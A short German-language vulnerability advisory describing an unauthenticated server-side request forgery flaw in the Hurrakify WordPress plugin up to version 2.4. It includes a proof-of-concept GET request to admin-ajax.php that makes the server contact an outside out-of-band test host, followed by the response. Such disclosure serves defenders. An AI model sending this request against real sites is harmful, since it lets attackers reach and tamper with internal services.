
Hurrakify <= 2.4 - Nicht authentifizierte Server-Side Request Forgery
Hurrakify <= 2.4 - Nicht authentifizierte Server-Side Request Forgery
Das Hurrakify-Plugin für WordPress ist in allen Versionen bis einschließlich 2.4 anfällig für Server-Side Request Forgery. Dadurch können nicht authentifizierte Angreifer Webanfragen an beliebige Orte senden, die von der Webanwendung ausgehen und dazu verwendet werden können, Informationen aus internen Diensten abzufragen und zu verändern.
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>